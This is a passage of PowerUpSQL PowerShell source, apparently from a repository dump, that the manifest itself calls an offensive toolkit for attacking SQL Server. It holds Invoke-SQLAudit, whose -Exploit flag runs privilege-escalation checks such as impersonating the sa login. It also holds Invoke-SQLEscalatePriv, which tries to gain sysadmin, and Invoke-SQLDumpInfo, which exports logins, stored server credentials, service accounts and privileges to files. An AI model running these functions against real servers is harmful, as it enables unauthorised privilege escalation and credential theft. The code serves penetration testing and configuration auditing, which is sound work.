    }\n    }\n\n    End {\n\n        #Use Try/Finally to catch Ctrl+C and clean up.\n        Try\n        {\n            #counts for progress\n            $totalCount = $allObjects.count\n            $script:completedCount = 0\n            $startedCount = 0\n\n            foreach($object in $allObjects)\n            {\n                #region add scripts to runspace pool\n\n                #Create the powershell instance, set verbose if needed, supply the scriptblock and parameters\n                $powershell = [powershell]::Create()\n\n                if ($VerbosePreference -eq 'Continue')\n                {\n                    [void]$powershell.AddScript({\n                            $VerbosePreference = 'Continue'\n                    })\n                }\n\n                [void]$powershell.AddScript($ScriptBlock).AddArgument($object)\n\n                if ($Parameter)\n                {\n                    [void]$powershell.AddArgument($Parameter)\n                }\n\n                # $Using support from Boe Prox\n                if ($UsingVariableData)\n                {\n                    Foreach($UsingVariable in $UsingVariableData)\n                    {\n                        #Write-Verbose \"Adding $($UsingVariable.Name) with value: $($UsingVariable.Value)\"\n                        [void]$powershell.AddArgument($UsingVariable.Value)\n                    }\n                }\n\n                #Add the runspace into the powershell instance\n                $powershell.RunspacePool = $runspacepool\n\n                #Create a temporary collection for each runspace\n                $temp = '' | Select-Object -Property PowerShell, StartTime, object, Runspace\n                $temp.PowerShell = $powershell\n                $temp.StartTime = Get-Date\n                $temp.object = $object\n\n                #Save the handle output when calling BeginInvoke() that will be used later to end the runspace\n                $temp.Runspace = $powershell.BeginInvoke()\n                $startedCount++\n\n                #Add the temp tracking info to $runspaces collection\n                #Write-Verbose ( \"Adding {0} to collection at {1}\" -f $temp.object, $temp.starttime.tostring() )\n                $null = $runspaces.Add($temp)\n\n                #loop through existing runspaces one time\n                Get-RunspaceData\n\n                #If we have more running than max queue (used to control timeout accuracy)\n                #Script scope resolves odd PowerShell 2 issue\n                $firstRun = $true\n                while ($runspaces.count -ge $script:MaxQueue)\n                {\n                    #give verbose output\n                    if($firstRun)\n                    {\n                        #Write-Verbose \"$($runspaces.count) items running - exceeded $Script:MaxQueue limit.\"\n                    }\n                    $firstRun = $false\n\n                    #run get-runspace data and sleep for a short while\n                    Get-RunspaceData\n                    Start-Sleep -Milliseconds $SleepTimer\n                }\n\n                #endregion add scripts to runspace pool\n            }\n\n            #Write-Verbose ( \"Finish processing the remaining runspace jobs: {0}\" -f ( @($runspaces | Where {$_.Runspace -ne $Null}).Count) )\n            Get-RunspaceData -wait\n\n            if (-not $Quiet)\n            {\n                Write-Progress -Activity 'Running Query' -Status 'Starting threads' -Completed\n            }\n        }\n        Finally\n        {\n            #Close the runspace pool, unless we specified no close on timeout and something timed out\n            if ( ($timedOutTasks -eq $false) -or ( ($timedOutTasks -eq $true) -and ($NoCloseOnTimeout -eq $false) ) )\n            {\n                Write-Verbose -Message 'Closing the runspace pool'\n                $runspacepool.close()\n            }\n\n            #collect garbage\n            [gc]::Collect()\n        }\n    }\n}\n\n\n\n#endregion\n\n#########################################################################\n#\n#region                 Primary FUNCTIONs\n#          Invoke-SQLDump, Invoke-SQLAudit, Invoke-SQLEscalatePriv\n#\n#########################################################################\n\n# ----------------------------------\n# Invoke-SQLAudit\n# ----------------------------------\n# Author: Scott Sutherland\nFunction Invoke-SQLAudit\n{\n    <#\n            .SYNOPSIS\n            Audit for high impact weak configurations by running all privilege escalation checks.\n            Note:  Use the Exploit flag to attempt to obtain sysadmin privileges.\n            .PARAMETER Username\n            SQL Server or domain account to authenticate with.\n            .PARAMETER Password\n            SQL Server or domain account password to authenticate with.\n            .PARAMETER Credential\n            SQL Server credential.\n            .PARAMETER Instance\n            SQL Server instance to connection to.\n            .PARAMETER NoOutput\n            Don't output anything.\n            .PARAMETER Exploit\n            Exploit vulnerable issues.\n            .PARAMETER OutFolder\n            Folder to write results to csv.\n            .EXAMPLE\n            PS C:\\> Invoke-SQLAudit -Instance SQLServer1\\STANDARDDEV2014 -user evil -Password Password123!\n\n            ComputerName  : SQLServer1\n            Instance      : SQLServer1\\STANDARDDEV2014\n            Vulnerability : PERMISSION - IMPERSONATE LOGIN\n            Description   : The current SQL Server login can impersonate other logins.  This may allow an authenticated login to gain additional privileges.\n            Remediation   : Consider using an alterative to impersonation such as signed stored procedures. Impersonation is enabled using a command like: GRANT IMPERSONATE ON\n            Login::sa to [user]. It can be removed using a command like: REVOKE IMPERSONATE ON Login::sa to [user]\n            Severity      : High\n            IsVulnerable  : Yes\n            IsExploitable : Yes\n            Exploited     : No\n            ExploitCmd    : Invoke-SQLAuditPrivImpersonateLogin -Instance SQLServer1\\STANDARDDEV2014 -Exploit\n            Details       : evil can impersonate the sa SYSADMIN login. This test was ran with the evil login.\n            Reference     : https://msdn.microsoft.com/en-us/library/ms181362.aspx\n            Author        : Scott Sutherland (@_nullbind), NetSPI 2016\n\n            [TRUNCATED]\n            .EXAMPLE\n            PS C:\\> Invoke-SQLAudit -Instance SQLServer1\\STANDARDDEV2014 -user evil -Password Password123! -Exploit\n            ComputerName  : SQLServer1\n            Instance      : SQLServer1\\STANDARDDEV2014\n            Vulnerability : PERMISSION - IMPERSONATE LOGIN\n            Description   : The current SQL Server login can impersonate other logins.  This may allow an authenticated login to gain additional privileges.\n            Remediation   : Consider using an alterative to impersonation such as signed stored procedures. Impersonation is enabled using a command like: GRANT IMPERSONATE ON\n            Login::sa to [user]. It can be removed using a command like: REVOKE IMPERSONATE ON Login::sa to [user]\n            Severity      : High\n            IsVulnerable  : Yes\n            IsExploitable : Yes\n            Exploited     : Yes\n            ExploitCmd    : Invoke-SQLAuditPrivImpersonateLogin -Instance SQLServer1\\STANDARDDEV2014 -Exploit\n            Details       : evil can impersonate the sa SYSADMIN login. This test was ran with the evil login.\n            Reference     : https://msdn.microsoft.com/en-us/library/ms181362.aspx\n            Author        : Scott Sutherland (@_nullbind), NetSPI 2016\n            .EXAMPLE\n            PS C:\\> Invoke-SQLAudit -Instance SQLServer1\\STANDARDDEV2014 -user evil -Password Password123! -OutFolder c:\\temp\n\n            [TRUNCATED]\n    #>\n    [CmdletBinding()]\n    Param(\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'SQL Server or domain account to authenticate with.')]\n        [string]$Username,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'SQL Server or domain account password to authenticate with.')]\n        [string]$Password,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Windows credentials.')]\n        [System.Management.Automation.PSCredential]\n        [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'SQL Server instance to connection to.')]\n        [string]$Instance,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = \"Don't output anything.\")]\n        [switch]$NoOutput,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Exploit vulnerable issues.')]\n        [switch]$Exploit,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Folder to write results to csv.')]\n        [string]$OutFolder\n    )\n\n    Begin\n    {\n        # Table for output\n        $TblData = New-Object -TypeName System.Data.DataTable\n        $null = $TblData.Columns.Add('ComputerName')\n        $null = $TblData.Columns.Add('Instance')\n        $null = $TblData.Columns.Add('Vulnerability')\n        $null = $TblData.Columns.Add('Description')\n        $null = $TblData.Columns.Add('Remediation')\n        $null = $TblData.Columns.Add('Severity')\n        $null = $TblData.Columns.Add('IsVulnerable')\n        $null = $TblData.Columns.Add('IsExploitable')\n        $null = $TblData.Columns.Add('Exploited')\n        $null = $TblData.Columns.Add('ExploitCmd')\n        $null = $TblData.Columns.Add('Details')\n        $null = $TblData.Columns.Add('Reference')\n        $null = $TblData.Columns.Add('Author')\n\n        # Table for escalation functions\n        $TblVulnFunc = New-Object -TypeName System.Data.DataTable\n        $null = $TblVulnFunc.Columns.Add('FunctionName')\n        $null = $TblVulnFunc.Columns.Add('Type')\n        $TblVulnFunc.Clear()\n\n        Write-Verbose -Message 'LOADING VULNERABILITY CHECKS.'\n\n        # Load list of vulnerability check functions - Server / database\n        $null = $TblVulnFunc.Rows.Add('Invoke-SQLAuditDefaultLoginPw ','Server')   \n        $null = $TblVulnFunc.Rows.Add('Invoke-SQLAuditWeakLoginPw','Server')\n        $null = $TblVulnFunc.Rows.Add('Invoke-SQLAuditPrivImpersonateLogin','Server')\n        $null = $TblVulnFunc.Rows.Add('Invoke-SQLAuditPrivServerLink','Server')\n        $null = $TblVulnFunc.Rows.Add('Invoke-SQLAuditPrivTrustworthy','Database')\n        $null = $TblVulnFunc.Rows.Add('Invoke-SQLAuditPrivDbChaining','Database')\n        $null = $TblVulnFunc.Rows.Add('Invoke-SQLAuditPrivCreateProcedure','Database')\n        $null = $TblVulnFunc.Rows.Add('Invoke-SQLAuditPrivXpDirtree','Database')\n        $null = $TblVulnFunc.Rows.Add('Invoke-SQLAuditPrivXpFileexist','Database')\n        $null = $TblVulnFunc.Rows.Add('Invoke-SQLAuditRoleDbDdlAdmin','Database')\n        $null = $TblVulnFunc.Rows.Add('Invoke-SQLAuditRoleDbOwner','Database')\n        $null = $TblVulnFunc.Rows.Add('Invoke-SQLAuditSampleDataByColumn','Database')\n        $null = $TblVulnFunc.Rows.Add('Invoke-SQLAuditSQLiSpExecuteAs','Database')\n        $null = $TblVulnFunc.Rows.Add('Invoke-SQLAuditSQLiSpSigned','Database')\n        $null = $TblVulnFunc.Rows.Add('Invoke-SQLAuditPrivAutoExecSp','Database') \n         \n        Write-Verbose -Message 'RUNNING VULNERABILITY CHECKS.'\n    }\n\n    Process\n    {\n        # Test connection to server\n        $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript {\n            $_.Status -eq 'Accessible'\n        }\n        if(-not $TestConnection)\n        {\n            Return\n        }\n\n        # Default connection to local default instance\n        if(-not $Instance)\n        {\n            $Instance = $env:COMPUTERNAME\n        }\n\n        # Status user\n        Write-Verbose -Message \"$Instance : RUNNING VULNERABILITY CHECKS...\"\n\n        # Iterate through each function\n        $TblVulnFunc |\n        ForEach-Object -Process {\n            # Get function name\n            $FunctionName = $_.FunctionName\n\n            # Run function\n            if($Exploit)\n            {\n                $TblTemp = Invoke-Expression -Command \"$FunctionName -Instance '$Instance' -Username '$Username' -Password '$Password' -Exploit\"\n            }\n            else\n            {\n                $TblTemp = Invoke-Expression -Command \"$FunctionName -Instance '$Instance' -Username '$Username' -Password '$Password'\"\n            }\n\n            # Append function output to results table\n            $TblData = $TblData + $TblTemp\n        }\n\n        # Status user\n        Write-Verbose -Message \"$Instance : COMPLETED VULNERABILITY CHECK.\"\n    }\n\n    End\n    {\n        # Status user\n        Write-Verbose -Message 'COMPLETED ALL VULNERABILITY CHECKS.'\n\n        # Setup output directory and write results\n        if($OutFolder)\n        {\n            $OutFolderCmd = \"echo test > $OutFolder\\test.txt\"\n            $CheckAccess = (Invoke-Expression -Command $OutFolderCmd) 2>&1\n            if($CheckAccess -like '*denied.')\n            {\n                Write-Verbose -Object 'Access denied to output directory.'\n                Return\n            }\n            else\n            {\n                Write-Verbose -Message 'Verified write access to output directory.'\n                $RemoveCmd = \"del $OutFolder\\test.txt\"\n                Invoke-Expression -Command $RemoveCmd\n                $OutPutInstance = $Instance.Replace('\\','-').Replace(',','-')\n                $OutPutPath = \"$OutFolder\\\"+'PowerUpSQL_Audit_Results_'+$OutPutInstance+'.csv'\n                $OutPutInstance\n                $OutPutPath\n                $TblData  | Export-Csv -NoTypeInformation $OutPutPath\n            }\n        }\n\n        # Return full results table\n        if ( -not $NoOutput)\n        {\n            Return $TblData\n        }\n    }\n}\n\n\n# ----------------------------------\n# Invoke-SQLEscalatePriv\n# ----------------------------------\n# Author: Scott Sutherland\nFunction Invoke-SQLEscalatePriv\n{\n    <#\n            .SYNOPSIS\n            This function can be used to attempt to obtain sysadmin privileges via identify vulnerabilities.\n            .PARAMETER Username\n            SQL Server or domain account to authenticate with.\n            .PARAMETER Password\n            SQL Server or domain account password to authenticate with.\n            .PARAMETER Credential\n            SQL Server credential.\n            .PARAMETER Instance\n            SQL Server instance to connection to.\n            .EXAMPLE\n            PS C:\\> Invoke-SQLEscalatePriv -Instance SQLServer1\\STANDARDDEV2014 -Username evil -Password Password123!\n    #>\n    [CmdletBinding()]\n    Param(\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'SQL Server or domain account to authenticate with.')]\n        [string]$Username,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'SQL Server or domain account password to authenticate with.')]\n        [string]$Password,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Windows credentials.')]\n        [System.Management.Automation.PSCredential]\n        [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'SQL Server instance to connection to.')]\n        [string]$Instance\n    )\n\n    Begin\n    {\n    }\n\n    Process\n    {\n        # Test connection to server\n        $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript {\n            $_.Status -eq 'Accessible'\n        }\n        if(-not $TestConnection)\n        {\n            Return\n        }\n\n        # Default connection to local default instance\n        if(-not $Instance)\n        {\n            $Instance = $env:COMPUTERNAME\n        }\n\n        # Check for sysadmin\n        Write-Verbose -Message \"$Instance : Checking if you're already a sysadmin...\"\n        $IsSysadmin = Get-SQLSysadminCheck -Instance $Instance -Credential $Credential -Username $Username -Password $Password -SuppressVerbose | Select-Object -Property IsSysadmin -ExpandProperty IsSysadmin\n        if($IsSysadmin -eq 'Yes')\n        {\n            Write-Verbose -Message \"$Instance : You are, so nothing to do here. :)\"\n        }\n        else\n        {\n            Write-Verbose -Message \"$Instance : You're not a sysadmin, attempting to change that...\"\n            Invoke-SQLAudit -Instance $Instance -Username $Username -Password $Password -Credential $Credential -NoOutput -Exploit\n\n            # Check for sysadmin again\n            $IsSysadmin2 = Get-SQLSysadminCheck -Instance $Instance -Credential $Credential -Username $Username -Password $Password -SuppressVerbose | Select-Object -Property IsSysadmin -ExpandProperty IsSysadmin\n            if($IsSysadmin2 -eq 'Yes')\n            {\n                Write-Verbose -Message \"$Instance : Success! You are now a sysadmin!\"\n            }\n            else\n            {\n                Write-Verbose -Message \"$Instance : Fail. We couldn't get you sysadmin access today.\"\n            }\n        }\n    }\n\n    End\n    {\n    }\n}\n\n# ----------------------------------\n# Invoke-SQLDumpInfo\n# ----------------------------------\n# Author: Scott Sutherland\nFunction Invoke-SQLDumpInfo\n{\n    <#\n            .SYNOPSIS\n            This function can be used to attempt to obtain sysadmin privileges via identify vulnerabilities.  It supports both csv and xml output.\n            .PARAMETER Username\n            SQL Server or domain account to authenticate with.\n            .PARAMETER Password\n            SQL Server or domain account password to authenticate with.\n            .PARAMETER Credential\n            SQL Server credential.\n            .PARAMETER Instance\n            SQL Server instance to connection to.\n            .PARAMETER XML\n            Generate xml output instead of csv.\n            .PARAMETER OutFolder\n            Output to a specific path instead of the current directory.\n            .EXAMPLE\n            PS C:\\> Get-SQLInstanceLocal | Invoke-SQLDumpInfo -Verbose\n            .EXAMPLE\n            PS C:\\> Invoke-SQLDumpInfo -Verobse -Instance SQLServer1\\STANDARDDEV2014 -Username evil -Password Password123!\n    #>\n    [CmdletBinding()]\n    Param(\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'SQL Server or domain account to authenticate with.')]\n        [string]$Username,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'SQL Server or domain account password to authenticate with.')]\n        [string]$Password,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Windows credentials.')]\n        [System.Management.Automation.PSCredential]\n        [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'SQL Server instance to connection to.')]\n        [string]$Instance,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Folder to write output to.')]\n        [string]$OutFolder,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Write output to xml files.')]\n        [switch]$xml,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Write output to csv files.')]\n        [switch]$csv\n    )\n\n    Begin\n    {\n        # Setup output directory\n        if($OutFolder)\n        {\n            $OutFolderCmd = \"echo test > $OutFolder\\test.txt\"\n        }\n        else\n        {\n            $OutFolder = '.'\n            $OutFolderCmd = \"echo test > $OutFolder\\test.txt\"\n        }\n\n        # Create output folder\n        $CheckAccess = (Invoke-Expression -Command $OutFolderCmd) 2>&1\n        if($CheckAccess -like '*denied.')\n        {\n            Write-Host -Object 'Access denied to output directory.'\n            Return\n        }\n        else\n        {\n            Write-Verbose -Message 'Verified write access to output directory.'\n            $RemoveCmd = \"del $OutFolder\\test.txt\"\n            Invoke-Expression -Command $RemoveCmd\n        }\n    }\n\n    Process\n    {\n        # Test connection to server\n        $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript {\n            $_.Status -eq 'Accessible'\n        }\n        if(-not $TestConnection)\n        {\n            Return\n        }\n\n        # Default connection to local default instance\n        if(-not $Instance)\n        {\n            $Instance = $env:COMPUTERNAME\n        }\n\n        Write-Verbose -Message \"$Instance - START...\"\n        $OutPutInstance = $Instance.Replace('\\','-').Replace(',','-')\n\n        # Getting Databases\n        Write-Verbose -Message \"$Instance - Getting non-default databases...\"\n        $Results = Get-SQLDatabase -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose -NoDefaults\n        if($xml)\n        {\n            $OutPutPath = \"$OutFolder\\$OutPutInstance\"+'_Databases.xml'\n            $Results | Export-Clixml $OutPutPath\n        }\n        else\n        {\n            $OutPutPath = \"$OutFolder\\$OutPutInstance\"+'_Databases.csv'\n            $Results | Export-Csv -NoTypeInformation $OutPutPath\n        }\n\n        # Getting DatabaseUsers\n        Write-Verbose -Message \"$Instance - Getting database users for databases...\"\n        $Results = Get-SQLDatabaseUser -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose -NoDefaults\n        if($xml)\n        {\n            $OutPutPath = \"$OutFolder\\$OutPutInstance\"+'_Database_Users.xml'\n            $Results | Export-Clixml $OutPutPath\n        }\n        else\n        {\n            $OutPutPath = \"$OutFolder\\$OutPutInstance\"+'_Database_Users.csv'\n            $Results | Export-Csv -NoTypeInformation $OutPutPath\n        }\n\n        # Getting DatabasePrivs\n        Write-Verbose -Message \"$Instance - Getting privileges for databases...\"\n        $Results = Get-SQLDatabasePriv -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose -NoDefaults\n        if($xml)\n        {\n            $OutPutPath = \"$OutFolder\\$OutPutInstance\"+'_Database_privileges.xml'\n            $Results | Export-Clixml $OutPutPath\n        }\n        else\n        {\n            $OutPutPath = \"$OutFolder\\$OutPutInstance\"+'_Database_privileges.csv'\n            $Results | Export-Csv -NoTypeInformation $OutPutPath\n        }\n\n        # Getting DatabaseRoles\n        Write-Verbose -Message \"$Instance - Getting database roles...\"\n        $Results = Get-SQLDatabaseRole -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose -NoDefaults\n        if($xml)\n        {\n            $OutPutPath = \"$OutFolder\\$OutPutInstance\"+'_Database_roles.xml'\n            $Results | Export-Clixml $OutPutPath\n        }\n        else\n        {\n            $OutPutPath = \"$OutFolder\\$OutPutInstance\"+'_Database_roles.csv'\n            $Results | Export-Csv -NoTypeInformation $OutPutPath\n        }\n\n        # Getting DatabaseRoleMembers\n        Write-Verbose -Message \"$Instance - Getting database role members...\"\n        $Results = Get-SQLDatabaseRoleMember -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose -NoDefaults\n        if($xml)\n        {\n            $OutPutPath = \"$OutFolder\\$OutPutInstance\"+'_Database_role_members.xml'\n            $Results | Export-Clixml $OutPutPath\n        }\n        else\n        {\n            $OutPutPath = \"$OutFolder\\$OutPutInstance\"+'_Database_role_members.csv'\n            $Results | Export-Csv -NoTypeInformation $OutPutPath\n        }\n\n        # Getting DatabaseTables\n        Write-Verbose -Message \"$Instance - Getting database schemas...\"\n        $Results = Get-SQLDatabaseSchema -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose -NoDefaults\n        if($xml)\n        {\n            $OutPutPath = \"$OutFolder\\$OutPutInstance\"+'_Database_schemas.xml'\n            $Results | Export-Clixml $OutPutPath\n        }\n        else\n        {\n            $OutPutPath = \"$OutFolder\\$OutPutInstance\"+'_Database_schemas.csv'\n            $Results | Export-Csv -NoTypeInformation $OutPutPath\n        }\n\n        # Getting DatabaseTables\n        Write-Verbose -Message \"$Instance - Getting database tables...\"\n        $Results = Get-SQLTable -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose -NoDefaults\n        if($xml)\n        {\n            $OutPutPath = \"$OutFolder\\$OutPutInstance\"+'_Database_tables.xml'\n            $Results | Export-Clixml $OutPutPath\n        }\n        else\n        {\n            $OutPutPath = \"$OutFolder\\$OutPutInstance\"+'_Database_tables.csv'\n            $Results | Export-Csv -NoTypeInformation $OutPutPath\n        }\n\n        # Getting DatabaseViews\n        Write-Verbose -Message \"$Instance - Getting database views...\"\n        $Results = Get-SQLView -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose -NoDefaults\n        if($xml)\n        {\n            $OutPutPath = \"$OutFolder\\$OutPutInstance\"+'_Database_views.xml'\n            $Results | Export-Clixml $OutPutPath\n        }\n        else\n        {\n            $OutPutPath = \"$OutFolder\\$OutPutInstance\"+'_Database_views.csv'\n            $Results | Export-Csv -NoTypeInformation $OutPutPath\n        }\n\n        # Getting Database Tables\n        Write-Verbose -Message \"$Instance - Getting database columns...\"\n        $Results = Get-SQLColumn -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose -NoDefaults\n        if($xml)\n        {\n            $OutPutPath = \"$OutFolder\\$OutPutInstance\"+'_Database_columns.xml'\n            $Results | Export-Clixml $OutPutPath\n        }\n        else\n        {\n            $OutPutPath = \"$OutFolder\\$OutPutInstance\"+'_Database_columns.csv'\n            $Results | Export-Csv -NoTypeInformation $OutPutPath\n        }\n\n        # Getting Server Logins\n        Write-Verbose -Message \"$Instance - Getting server logins...\"\n        $Results = Get-SQLServerLogin -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose\n        if($xml)\n        {\n            $OutPutPath = \"$OutFolder\\$OutPutInstance\"+'_Server_logins.xml'\n            $Results | Export-Clixml $OutPutPath\n        }\n        else\n        {\n            $OutPutPath = \"$OutFolder\\$OutPutInstance\"+'_Server_logins.csv'\n            $Results | Export-Csv -NoTypeInformation $OutPutPath\n        }\n\n        # Getting Server Logins\n        Write-Verbose -Message \"$Instance - Getting server configuration settings...\"\n        $Results = Get-SQLServerConfiguration -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose\n        if($xml)\n        {\n            $OutPutPath = \"$OutFolder\\$OutPutInstance\"+'_Server_Configuration.xml'\n            $Results | Export-Clixml $OutPutPath\n        }\n        else\n        {\n            $OutPutPath = \"$OutFolder\\$OutPutInstance\"+'_Server_Configuration.csv'\n            $Results | Export-Csv -NoTypeInformation $OutPutPath\n        }\n\n        # Getting Server Privs\n        Write-Verbose -Message \"$Instance - Getting server privileges...\"\n        $Results = Get-SQLServerPriv -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose\n        if($xml)\n        {\n            $OutPutPath = \"$OutFolder\\$OutPutInstance\"+'_Server_privileges.xml'\n            $Results | Export-Clixml $OutPutPath\n        }\n        else\n        {\n            $OutPutPath = \"$OutFolder\\$OutPutInstance\"+'_Server_privileges.csv'\n            $Results | Export-Csv -NoTypeInformation $OutPutPath\n        }\n\n        # Getting Server Roles\n        Write-Verbose -Message \"$Instance - Getting server roles...\"\n        $Results = Get-SQLServerRole -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose\n        if($xml)\n        {\n            $OutPutPath = \"$OutFolder\\$OutPutInstance\"+'_Server_roles.xml'\n            $Results | Export-Clixml $OutPutPath\n        }\n        else\n        {\n            $OutPutPath = \"$OutFolder\\$OutPutInstance\"+'_Server_roles.csv'\n            $Results | Export-Csv -NoTypeInformation $OutPutPath\n        }\n\n        # Getting Server Role Members\n        Write-Verbose -Message \"$Instance - Getting server role members...\"\n        $Results = Get-SQLServerRoleMember -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose\n        if($xml)\n        {\n            $OutPutPath = \"$OutFolder\\$OutPutInstance\"+'_Server_rolemembers.xml'\n            $Results | Export-Clixml $OutPutPath\n        }\n        else\n        {\n            $OutPutPath = \"$OutFolder\\$OutPutInstance\"+'_Server_rolemembers.csv'\n            $Results | Export-Csv -NoTypeInformation $OutPutPath\n        }\n\n        # Getting Server Links\n        Write-Verbose -Message \"$Instance - Getting server links...\"\n        $Results = Get-SQLServerLink -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose\n        if($xml)\n        {\n            $OutPutPath = \"$OutFolder\\$OutPutInstance\"+'_Server_links.xml'\n            $Results | Export-Clixml $OutPutPath\n        }\n        else\n        {\n            $OutPutPath = \"$OutFolder\\$OutPutInstance\"+'_Server_links.csv'\n            $Results | Export-Csv -NoTypeInformation $OutPutPath\n        }\n\n        # Getting Server Credentials\n        Write-Verbose -Message \"$Instance - Getting server credentials...\"\n        $Results = Get-SQLServerCredential -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose\n        if($xml)\n        {\n            $OutPutPath = \"$OutFolder\\$OutPutInstance\"+'_Server_credentials.xml'\n            $Results | Export-Clixml $OutPutPath\n        }\n        else\n        {\n            $OutPutPath = \"$OutFolder\\$OutPutInstance\"+'_Server_credentials.csv'\n            $Results | Export-Csv -NoTypeInformation $OutPutPath\n        }\n\n        # Getting Service Accounts\n        Write-Verbose -Message \"$Instance - Getting SQL Server service accounts...\"\n        $Results = Get-SQLServiceAccount -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose\n        if($xml)\n        {\n            $OutPutPath = \"$OutFolder\\$OutPutInstance\"+'_Service_accounts.xml'\n            $Results | Export-Clixml $OutPutPath\n        }\n        else\n        {\n            $OutPutPath = \"$OutFolder\\$OutPutInstance\"+'_Service_accounts.csv'\n            $Results | Export-Csv -NoTypeInformation $OutPutPath\n        }\n\n        # Getting Stored Procedures\n        Write-Verbose -Message \"$Instance - Getting stored procedures...\"\n        $Results = Get-SQLStoredProcedure -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose\n        if($xml)\n        {\n            $OutPutPath = \"$OutFolder\\$OutPutInstance\"+'_Server_stored_procedure.xml'\n            $Results | Export-Clixml $OutPutPath\n        }\n        else\n        {\n            $OutPutPath = \"$OutFolder\\$OutPutInstance\"+'_Server_stored_procedure.csv'\n            $Results | Export-Csv -NoTypeInformation $OutPutPath\n        }\n\n        # Getting Triggers DML\n        Write-Verbose -Message \"$Instance - Getting DML triggers...\"\n        $Results = Get-SQLTriggerDml -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose\n        if($xml)\n        {\n            $OutPutPath = \"$OutFolder\\$OutPutInstance\"+'_Server_triggers_dml.xml'\n            $Results | Export-Clixml $OutPutPath\n        }\n        else\n        {\n            $OutPutPath = \"$OutFolder\\$OutPutInstance\"+'_Server_triggers_dml.csv'\n            $Results | Export-Csv -NoTypeInformation $OutPutPath\n        }\n\n        # Getting Triggers DDL\n        Write-Verbose -Message \"$Instance - Getting DDL triggers...\"\n        $Results = Get-SQLTriggerDdl -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose\n        if($xml)\n        {\n            $OutPutPath = \"$OutFolder\\$OutPutInstance\"+'_Server_triggers_ddl.xml'\n            $Results | Export-Clixml $OutPutPath\n        }\n        else\n        {\n            $OutPutPath = \"$OutFolder\\$OutPutInstance\"+'_Server_triggers_ddl.csv'\n            $Results | Export-Csv -NoTypeInformation $OutPutPath\n        }\n\n        # Getting Version Information\n        Write-Verbose -Message \"$Instance - Getting server version information...\"\n        $Results = Get-SQLServerInfo -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose\n        if($xml)\n        {\n            $OutPutPath = \"$OutFolder\\$OutPutInstance\"+'_Server_triggers_dml.xml'\n            $Results | Export-Clixml $OutPutPath\n        }\n        else\n        {\n            $OutPutPath = \"$OutFolder\\$OutPutInstance\"+'_Server_triggers_dml.csv'\n            $Results | Export-Csv -NoTypeInformation $OutPutPath\n        }\n\n        Write-Verbose -Message \"$Instance - END\"\n    }\n\n    End\n    {\n    }\n}\n\n#endregion\n"
  },
  {
    "path": "modules/PowerUpSQL.psd1",
    "content": "#requires -Version 1\n@{\n    ModuleToProcess   = 'PowerUpSQL.psm1'\n    ModuleVersion     = '1.0.0.76'\n    GUID              = 'dd1fe106-2226-4869-9363-44469e930a4a'\n    Author            = 'Scott Sutherland'\n    Copyright         = 'BSD 3-Clause'\n    Description       = 'PowerUpSQL is an offensive toolkit designed for attacking SQL Server.  The PowerUpSQL module includes functions that support SQL Server discovery, auditing for common weak configurations, and privilege escalation on scale.  It is intended to be used during penetration tests and red team engagements. However, PowerUpSQL also includes many functions that could be used by administrators to inventory the SQL Servers on their ADS domain very quickly.  More information can be found at https://github.com/NetSPI/PowerUpSQL.'\n    PowerShellVersion = '2.0'\n    FunctionsToExport = @(  \n        'Create-SQLFileXpDll', \n        'Create-SQLFileCLRDll', \n        'Get-SQLAgentJob',\n        'Get-SQLAuditDatabaseSpec', \n        'Get-SQLAuditServerSpec', \n        'Get-SQLColumn', \n        'Get-SQLColumnSampleData', \n        